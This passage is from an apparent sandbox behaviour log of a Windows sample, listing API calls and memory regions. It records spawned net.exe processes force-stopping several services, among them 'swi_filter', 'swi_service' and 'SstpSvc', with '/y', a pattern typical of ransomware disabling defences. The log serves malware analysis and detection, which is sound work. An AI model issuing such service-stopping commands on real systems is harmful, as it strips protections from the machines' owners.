ByteCount=0x18, Buffer=0xcfb28 | out: Buffer=0xcfb28*=0x1cc100) returned 0x0 [0114.586] _fileno (_File=0x7fefdba2a80) returned 0 [0114.587] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0114.587] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0114.587] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0114.587] _wcsicmp (_String1="config", _String2="stop") returned -16 [0114.587] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0114.587] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0114.587] _wcsicmp (_String1="file", _String2="stop") returned -13 [0114.587] _wcsicmp (_String1="files", _String2="stop") returned -13 [0114.587] _wcsicmp (_String1="group", _String2="stop") returned -12 [0114.587] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0114.587] _wcsicmp (_String1="help", _String2="stop") returned -11 [0114.587] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0114.587] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0114.587] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0114.587] _wcsicmp (_String1="session", _String2="stop") returned -15 [0114.587] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0114.587] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0114.588] _wcsicmp (_String1="share", _String2="stop") returned -12 [0114.588] _wcsicmp (_String1="start", _String2="stop") returned -14 [0114.588] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0114.588] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0114.588] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0114.588] _wcsicmp (_String1="accounts", _String2="SntpService") returned -18 [0114.588] _wcsicmp (_String1="computer", _String2="SntpService") returned -16 [0114.588] _wcsicmp (_String1="config", _String2="SntpService") returned -16 [0114.588] _wcsicmp (_String1="continue", _String2="SntpService") returned -16 [0114.588] _wcsicmp (_String1="cont", _String2="SntpService") returned -16 [0114.588] _wcsicmp (_String1="file", _String2="SntpService") returned -13 [0114.588] _wcsicmp (_String1="files", _String2="SntpService") returned -13 [0114.588] _wcsicmp (_String1="group", _String2="SntpService") returned -12 [0114.588] _wcsicmp (_String1="groups", _String2="SntpService") returned -12 [0114.588] _wcsicmp (_String1="help", _String2="SntpService") returned -11 [0114.588] _wcsicmp (_String1="helpmsg", _String2="SntpService") returned -11 [0114.588] _wcsicmp (_String1="localgroup", _String2="SntpService") returned -7 [0114.588] _wcsicmp (_String1="pause", _String2="SntpService") returned -3 [0114.588] _wcsicmp (_String1="session", _String2="SntpService") returned -9 [0114.589] _wcsicmp (_String1="sessions", _String2="SntpService") returned -9 [0114.589] _wcsicmp (_String1="sess", _String2="SntpService") returned -9 [0114.589] _wcsicmp (_String1="share", _String2="SntpService") returned -6 [0114.589] _wcsicmp (_String1="start", _String2="SntpService") returned 6 [0114.589] _wcsicmp (_String1="stats", _String2="SntpService") returned 6 [0114.589] _wcsicmp (_String1="statistics", _String2="SntpService") returned 6 [0114.589] _wcsicmp (_String1="stop", _String2="SntpService") returned 6 [0114.589] _wcsicmp (_String1="time", _String2="SntpService") returned 1 [0114.589] _wcsicmp (_String1="user", _String2="SntpService") returned 2 [0114.589] _wcsicmp (_String1="users", _String2="SntpService") returned 2 [0114.589] _wcsicmp (_String1="msg", _String2="SntpService") returned -6 [0114.589] _wcsicmp (_String1="messenger", _String2="SntpService") returned -6 [0114.589] _wcsicmp (_String1="receiver", _String2="SntpService") returned -1 [0114.589] _wcsicmp (_String1="rcv", _String2="SntpService") returned -1 [0114.589] _wcsicmp (_String1="netpopup", _String2="SntpService") returned -5 [0114.589] _wcsicmp (_String1="redirector", _String2="SntpService") returned -1 [0114.589] _wcsicmp (_String1="redir", _String2="SntpService") returned -1 [0114.589] _wcsicmp (_String1="rdr", _String2="SntpService") returned -1 [0114.589] _wcsicmp (_String1="workstation", _String2="SntpService") returned 4 [0114.589] _wcsicmp (_String1="work", _String2="SntpService") returned 4 [0114.589] _wcsicmp (_String1="wksta", _String2="SntpService") returned 4 [0114.590] _wcsicmp (_String1="prdr", _String2="SntpService") returned -3 [0114.590] _wcsicmp (_String1="devrdr", _String2="SntpService") returned -15 [0114.590] _wcsicmp (_String1="lanmanworkstation", _String2="SntpService") returned -7 [0114.590] _wcsicmp (_String1="server", _String2="SntpService") returned -9 [0114.590] _wcsicmp (_String1="svr", _String2="SntpService") returned 8 [0114.590] _wcsicmp (_String1="srv", _String2="SntpService") returned 4 [0114.590] _wcsicmp (_String1="lanmanserver", _String2="SntpService") returned -7 [0114.590] _wcsicmp (_String1="alerter", _String2="SntpService") returned -18 [0114.590] _wcsicmp (_String1="netlogon", _String2="SntpService") returned -5 [0114.590] _wcsupr (in: _String="SntpService" | out: _String="SNTPSERVICE") returned="SNTPSERVICE" [0114.590] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1cce10 [0114.595] GetServiceKeyNameW (in: hSCManager=0x1cce10, lpDisplayName="SNTPSERVICE", lpServiceName=0xff3f5750, lpcchBuffer=0xcfa48 | out: lpServiceName="", lpcchBuffer=0xcfa48) returned 0 [0114.596] _wcsicmp (_String1="msg", _String2="SNTPSERVICE") returned -6 [0114.596] _wcsicmp (_String1="messenger", _String2="SNTPSERVICE") returned -6 [0114.596] _wcsicmp (_String1="receiver", _String2="SNTPSERVICE") returned -1 [0114.596] _wcsicmp (_String1="rcv", _String2="SNTPSERVICE") returned -1 [0114.596] _wcsicmp (_String1="redirector", _String2="SNTPSERVICE") returned -1 [0114.596] _wcsicmp (_String1="redir", _String2="SNTPSERVICE") returned -1 [0114.596] _wcsicmp (_String1="rdr", _String2="SNTPSERVICE") returned -1 [0114.596] _wcsicmp (_String1="workstation", _String2="SNTPSERVICE") returned 4 [0114.597] _wcsicmp (_String1="work", _String2="SNTPSERVICE") returned 4 [0114.597] _wcsicmp (_String1="wksta", _String2="SNTPSERVICE") returned 4 [0114.597] _wcsicmp (_String1="prdr", _String2="SNTPSERVICE") returned -3 [0114.597] _wcsicmp (_String1="devrdr", _String2="SNTPSERVICE") returned -15 [0114.597] _wcsicmp (_String1="lanmanworkstation", _String2="SNTPSERVICE") returned -7 [0114.597] _wcsicmp (_String1="server", _String2="SNTPSERVICE") returned -9 [0114.597] _wcsicmp (_String1="svr", _String2="SNTPSERVICE") returned 8 [0114.597] _wcsicmp (_String1="srv", _String2="SNTPSERVICE") returned 4 [0114.597] _wcsicmp (_String1="lanmanserver", _String2="SNTPSERVICE") returned -7 [0114.597] _wcsicmp (_String1="alerter", _String2="SNTPSERVICE") returned -18 [0114.597] _wcsicmp (_String1="netlogon", _String2="SNTPSERVICE") returned -5 [0114.597] NetServiceControl (in: servername=0x0, service="SNTPSERVICE", opcode=0x0, arg=0x0, bufptr=0xcfa50 | out: bufptr=0xcfa50) returned 0x889 [0114.598] wcscpy_s (in: _Destination=0xff3f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0114.598] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0114.599] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0114.601] GetFileType (hFile=0xb) returned 0x2 [0114.602] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf918 | out: lpMode=0xcf918) returned 1 [0114.602] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcf910, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0xcf910*=0x1e) returned 1 [0114.603] GetFileType (hFile=0xb) returned 0x2 [0114.603] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf918 | out: lpMode=0xcf918) returned 1 [0114.603] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf910, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0xcf910*=0x2) returned 1 [0114.603] _ultow (in: _Dest=0x889, _Radix=850304 | out: _Dest=0x889) returned="2185" [0114.603] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0114.604] GetFileType (hFile=0xb) returned 0x2 [0114.604] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf918 | out: lpMode=0xcf918) returned 1 [0114.604] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcf910, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0xcf910*=0x34) returned 1 [0114.605] GetFileType (hFile=0xb) returned 0x2 [0114.605] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf918 | out: lpMode=0xcf918) returned 1 [0114.605] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf910, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0xcf910*=0x2) returned 1 [0114.606] NetApiBufferFree (Buffer=0x1c4d50) returned 0x0 [0114.606] NetApiBufferFree (Buffer=0x1cc100) returned 0x0 [0114.606] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SntpService /y" [0114.606] exit (_Code=2) Process: id = "310" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6ae12000" os_pid = "0x80c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop svcGenericHost /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11137 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11138 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11139 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11140 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 11141 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11142 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11143 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11144 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11145 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11146 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11147 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 11148 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 822 os_tid = 0x9d4 Process: id = "311" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x75331000" os_pid = "0x330" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop swi_filter /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11149 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11150 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11151 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11152 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 11153 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11154 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11155 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11156 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11157 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11158 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11159 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 11160 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 824 os_tid = 0xb68 Process: id = "312" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6dc51000" os_pid = "0x578" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop swi_service /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11184 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11185 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 11186 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 11187 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11188 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11189 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11190 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11191 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11192 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11193 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11194 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 11195 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 826 os_tid = 0x8dc Process: id = "313" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x2636a000" os_pid = "0x1204" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "308" os_parent_pid = "0x420" cmd_line = "C:\\Windows\\system32\\net1 stop SstpSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11196 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11197 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11198 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11199 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 11200 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11201 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11202 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11203 start_va = 0xff040000 end_va = 0xff072fff entry_point = 0xff040000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11204 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11205 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11206 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 11207 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11232 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11233 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11234 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11235 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 11236 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 11237 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11238 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11239 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11240 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11241 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11242 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11243 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11244 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11245 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11246 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11247 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11248 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11249 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11250 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11251 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11252 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11253 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11254 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11255 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11256 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11257 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11284 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 828 os_tid = 0x9cc [0115.245] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eff30 | out: lpSystemTimeAsFileTime=0x1eff30*(dwLowDateTime=0xf9deb270, dwHighDateTime=0x1d48689)) [0115.310] GetCurrentProcessId () returned 0x1204 [0115.310] GetCurrentThreadId () returned 0x9cc [0115.310] GetTickCount () returned 0x26824 [0115.310] QueryPerformanceCounter (in: lpPerformanceCount=0x1eff38 | out: lpPerformanceCount=0x1eff38*=1816222800000) returned 1 [0115.310] GetModuleHandleW (lpModuleName=0x0) returned 0xff040000 [0115.310] __set_app_type (_Type=0x1) [0115.310] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff059c9c) returned 0x0 [0115.310] __getmainargs (in: _Argc=0xff064780, _Argv=0xff064790, _Env=0xff064788, _DoWildCard=0, _StartInfo=0xff06479c | out: _Argc=0xff064780, _Argv=0xff064790, _Env=0xff064788) returned 0 [0115.310] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0115.311] GetConsoleOutputCP () returned 0x1b5 [0115.311] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff06cec0 | out: lpCPInfo=0xff06cec0) returned 1 [0115.311] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0115.313] sprintf_s (in: _DstBuf=0x1efed8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0115.313] setlocale (category=0, locale=".437") returned="English_United States.437" [0115.315] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.315] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0115.315] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SstpSvc /y" [0115.315] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1efc70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0115.315] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0115.315] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1efec8 | out: Buffer=0x1efec8*=0x264d40) returned 0x0 [0115.315] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1efec8 | out: Buffer=0x1efec8*=0x26c0e0) returned 0x0 [0115.315] _fileno (_File=0x7fefdba2a80) returned 0 [0115.315] 